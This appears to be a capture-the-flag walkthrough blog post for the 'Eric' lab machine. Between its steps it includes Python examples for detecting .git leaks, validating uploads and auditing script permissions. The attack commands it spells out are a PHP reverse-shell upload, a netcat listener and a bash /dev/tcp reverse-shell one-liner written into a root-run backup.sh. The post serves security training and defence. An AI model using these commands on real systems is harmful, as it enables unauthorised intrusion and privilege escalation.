Eric target penetration test complete tutorial
2022-08-02 03:59:00 【BIG_ right】
Environment setup
It does not matter whether the target VM has Internet access; what matters is that it is on the same network segment as the attacking machine.
Target machine: Eric
Attacking machine: Kali (192.168.56.102)
Penetration goals
Get the flag of a regular user
Get the flag of the root user
Penetration test walkthrough
It is known that the target and our Kali VM are on the same network segment, so first scan the segment with nmap to get Eric's IP address:
nmap -sF 192.168.56.0/24

Here you can see that the IP of the Eric target is 192.168.56.101.
It also shows that port 80 is open (port 22 is SSH, ignore it), so access it directly in the browser.

Clearly the blog has not been finished yet.
Now enumerate the site directories:
dirb http://192.168.56.101

As shown above, three sensitive directories are found that we are interested in.
Visiting admin.php shows a login page, but brute-forcing it did not work.....
Visiting upload gives no permission.
What matters here is the sensitive .git directory; use it as the breakthrough point. With one of the following tools, the files leaked from the .git folder can be used to reconstruct the project's source code (an exposed .git directory leaks the full history, including any credentials committed to it):
GitTools:https://github.com/internetwache/GitTools
GitHack:https://github.com/lijiejie/GitHack
GitHack is used here:
git clone https://github.com/lijiejie/GitHack.git
cd GitHack
Run the py file to reconstruct the site code:
python GitHack.py http://192.168.56.101/.git/

Look directly at what is in these php files.
Then the account and password can be found in admin.php.
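From the defender's side, the two steps just shown (directory brute-forcing with dirb, then pulling the repository out of /.git/) leave a very recognizable trace in the web server's access log. The Python below is an added example that is not part of the original post: it parses Apache/nginx "combined" log lines (the sample lines are constructed) and flags requests for version-control metadata, treating a 200 on a .git path as a confirmed exposure, plus bursts of 404s from one client. The threshold of three 404s is an assumption chosen for the sample data.

```python
import re
from collections import Counter

# Constructed sample access-log lines in "combined" format (not from the original post).
SAMPLE_LOG = """\
192.168.56.102 - - [02/Aug/2022:03:40:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.56.102 - - [02/Aug/2022:03:41:05 +0000] "GET /cgi-bin/ HTTP/1.1" 404 196 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
192.168.56.102 - - [02/Aug/2022:03:41:05 +0000] "GET /backup/ HTTP/1.1" 404 196 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
192.168.56.102 - - [02/Aug/2022:03:41:06 +0000] "GET /test/ HTTP/1.1" 404 196 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
192.168.56.102 - - [02/Aug/2022:03:41:06 +0000] "GET /.git/ HTTP/1.1" 403 199 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
192.168.56.102 - - [02/Aug/2022:03:42:10 +0000] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "Python-urllib/2.7"
192.168.56.102 - - [02/Aug/2022:03:42:10 +0000] "GET /.git/index HTTP/1.1" 200 4096 "-" "Python-urllib/2.7"
192.168.56.102 - - [02/Aug/2022:03:42:11 +0000] "GET /.git/objects/ab/cdef HTTP/1.1" 200 300 "-" "Python-urllib/2.7"
10.0.0.5 - - [02/Aug/2022:03:43:00 +0000] "GET /index.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

# client, ident, user, [timestamp], "METHOD path [protocol]", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3}) '
)

# Path prefixes that should never be reachable through the web server.
VCS_PREFIXES = ("/.git/", "/.svn/", "/.hg/")


def parse_line(line):
    """Return a dict with ip, ts, method, path, status (int), or None if the line is malformed."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def analyze(log_text, notfound_threshold=3):
    """Return a list of (severity, client_ip, rule, detail) findings for the given log text."""
    findings = []
    notfound = Counter()
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]
        # Any request into repository metadata is worth a look; a 200 means it was actually served.
        if path.startswith(VCS_PREFIXES):
            severity = "high" if rec["status"] == 200 else "medium"
            findings.append((severity, rec["ip"], "vcs-metadata", path))
        if rec["status"] == 404:
            notfound[rec["ip"]] += 1
    # Many 404s from one client in a short log window is the signature of wordlist enumeration.
    for ip, count in notfound.items():
        if count >= notfound_threshold:
            findings.append(("low", ip, "dir-enumeration", f"{count} responses with status 404"))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

The real fix for the leak itself is at the web server: deny access to any path containing /.git (and simply do not deploy the repository metadata into the web root). The log rule is there to catch the case where that configuration was forgotten.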

Try logging in directly with that account and password at http://192.168.56.101/admin.php
The login succeeds.
After logging in it turns out to be a file-upload site, which obviously allows uploading a shell.
Construct a shell; the one bundled with Kali can also be used.
The one bundled with Kali is used here:
cp /usr/share/webshells/php/php-reverse-shell.php ~/Desktop/test.php
The ip/port need to be changed (to the Kali machine's address):
vim test.php
After saving, start a listener on Kali; 1234 here is the port set in test.php above:
nc -nlvp 1234

Then upload the modified shell test.php through the interface after logging in.
Browse... choose the shell, then click Upload.
The uploaded file lands in the target site's /upload/ directory.
Access the shell directly in the browser:
http://192.168.56.101/upload/test.php
The reverse shell connects back successfully.
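The upload feature works as a shell delivery path only because the site accepts a .php file and then serves it from a directory where PHP executes. As an added example (not code from the original post or the target site), here is the check an upload handler should have been doing, written in Python: an extension allowlist, exactly one extension, the file's leading bytes must match that extension, no embedded PHP tags, and a random stored name so the client never picks the path. The allowlist and marker set are assumptions for the example.

```python
import os
import re
import secrets

# Allowed extensions and the magic bytes each must start with (assumed allowlist for the example).
ALLOWED = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}

# PHP open tags; an image that carries one is a polyglot and gets rejected regardless of extension.
PHP_MARKERS = (b"<?php", b"<?=", b"<script language=\"php\"")

FILENAME_RE = re.compile(r"[A-Za-z0-9._-]{1,100}")


def validate_upload(filename, data):
    """Return (ok, reason). Only the client-supplied name and the raw bytes are trusted as input."""
    base = os.path.basename(filename)          # drop any directory part the client sent
    if not FILENAME_RE.fullmatch(base):
        return False, "filename contains disallowed characters"
    parts = base.lower().split(".")
    # Exactly one extension: rejects "shell.php.png", ".htaccess" style names and bare names.
    if len(parts) != 2 or not parts[0]:
        return False, "exactly one extension is required"
    ext = parts[1]
    if ext not in ALLOWED:
        return False, f"extension .{ext} is not allowed"
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match the declared extension"
    if any(marker in data for marker in PHP_MARKERS):
        return False, "embedded PHP code"
    return True, "ok"


def stored_name(ext):
    """Server-chosen file name; the client's name is never used on disk."""
    return secrets.token_hex(16) + "." + ext


def handle_upload(filename, data):
    """Validate and return the name the file would be stored under, or None when rejected."""
    ok, _reason = validate_upload(filename, data)
    if not ok:
        return None
    return stored_name(filename.lower().rsplit(".", 1)[1])


if __name__ == "__main__":
    print(validate_upload("test.php", b"<?php echo 1; ?>"))
    print(validate_upload("avatar.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16))
```

Even with this check, the storage directory should sit outside the web root, or at least have script execution disabled for it, so that a file which slips through is only ever served as a static download.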

Next, in the nc window, go straight to the /home/eric/ directory and use ls -la to look at the files and their permissions.
Among them is flag.txt, which is our target.
backup.sh is also there with wrongly configured permissions; a script that other users can write to is an obvious privilege-escalation path, so that is what will be used to get root.
For now just get the regular user's flag:
cd /home/eric
ls -la
cat flag.txt

That obtains the flag under the regular user's permissions; the root user's flag is still missing.
First look at the contents of backup.sh:

It turns out to compress the site directory into an archive, so just modify the sh file directly.
Use the msf tool in Kali to print a shell script to use (lhost is Kali's IP, lport can be anything):
msfvenom -p cmd/unix/reverse_bash lhost=192.168.56.102 lport=1235 A

echo this script into backup.sh:
echo "bash -c '0<&78-;exec 78<>/dev/tcp/192.168.56.102/1235;sh <&78 >&78 2>&78'">backup.sh

Then start a listener on the Kali machine: nc -nlvp 1235 (1235 is the lport set in msf above).
Then run the sh file directly: ./backup.sh, and the privilege escalation succeeds.
Just cat flag.txt to see the flag under root.
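The root flag falls only because backup.sh is run with root privileges while a regular user is allowed to rewrite it. As an added example (not from the original post), the Python below audits a script the way a hardening check or a cron-job review would: owner must be the expected privileged account, no group or world write bit, not a symlink, and the containing directory must not let others replace the file. The demo creates two constructed scripts in a temporary directory, one with the broken 777 mode and one with 755; it passes the current uid as the expected owner because the demo cannot create root-owned files.

```python
import os
import stat
import tempfile


def audit_privileged_script(path, expected_uid=0):
    """Return a list of findings for a script that root (or a cron job) executes; empty means clean."""
    findings = []
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        # A symlink in a path root executes can be repointed by whoever owns the link's directory.
        findings.append("is a symlink; its target could be swapped")
        st = os.stat(path)
    if st.st_uid != expected_uid:
        findings.append(f"owned by uid {st.st_uid}, expected {expected_uid}")
    if st.st_mode & stat.S_IWGRP:
        findings.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        findings.append("world-writable")
    parent = os.stat(os.path.dirname(os.path.abspath(path)))
    # A world-writable directory without the sticky bit lets anyone delete and recreate the script.
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        findings.append("parent directory is world-writable without the sticky bit")
    return findings


def demo():
    """Constructed scenario: a 777 backup.sh next to a 755 one; returns both audit results."""
    with tempfile.TemporaryDirectory() as d:
        bad = os.path.join(d, "backup.sh")
        good = os.path.join(d, "good.sh")
        for p in (bad, good):
            with open(p, "w") as f:
                # Constructed body mirroring what the post describes: archive the site directory.
                f.write("#!/bin/sh\ntar czf /root/site.tgz /var/www\n")
        os.chmod(bad, 0o777)
        os.chmod(good, 0o755)
        me = os.getuid()   # stands in for root in this demo (see lead-in)
        return audit_privileged_script(bad, me), audit_privileged_script(good, me)


if __name__ == "__main__":
    bad_findings, good_findings = demo()
    print("backup.sh:", bad_findings)
    print("good.sh:", good_findings)
```

On a real host the call would be audit_privileged_script("/path/to/backup.sh") with the default expected_uid of 0, applied to everything referenced from root's crontab, /etc/cron.*, and any sudo rules.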

This obtains the flag under ROOT user permissions.
Done, confetti ***